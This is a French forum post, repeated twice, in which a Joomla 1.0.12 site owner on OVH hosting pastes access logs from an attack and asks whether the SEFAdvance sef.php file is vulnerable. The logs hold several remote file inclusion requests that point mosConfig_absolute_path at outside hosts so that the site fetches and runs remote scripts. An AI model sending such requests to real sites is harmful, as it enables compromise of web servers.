Bonsoir !
Je suis sur Joomla 1.0.12 en mutualisé OVH90 plan
Mon site web est pour la 2eme fois en 3 jours par OVH pour la raison suivante:
Problème rencontré : Hidden PERL script
Commande apparente : init_4
Exécutable utilisé : /usr/bin/perl
Je pense qu'ils ont bien raison, ça sent pas bon ! voici le bout de log que j'ai recupéré aujourd'hui:
Malheureusement, mes compétences s'arretent la car je ne sais pas quoi faire contre cette attaque...
Le fichier sef.php est il faillible ? (j'utilise SEFAdvance )
Merci d'avance !
Je suis sur Joomla 1.0.12 en mutualisé OVH90 plan
Mon site web est pour la 2eme fois en 3 jours par OVH pour la raison suivante:
Problème rencontré : Hidden PERL script
Commande apparente : init_4
Exécutable utilisé : /usr/bin/perl
Je pense qu'ils ont bien raison, ça sent pas bon ! voici le bout de log que j'ai recupéré aujourd'hui:
Code:
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:51 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:54 +0100] "GET /bric-a-brac/section// HTTP/1.1" 404 40352 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:16 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/xt.gif? HTTP/1.1" 200 174 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:17 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 342 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:59 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
Malheureusement, mes compétences s'arretent la car je ne sais pas quoi faire contre cette attaque...
Le fichier sef.php est il faillible ? (j'utilise SEFAdvance )
Merci d'avance !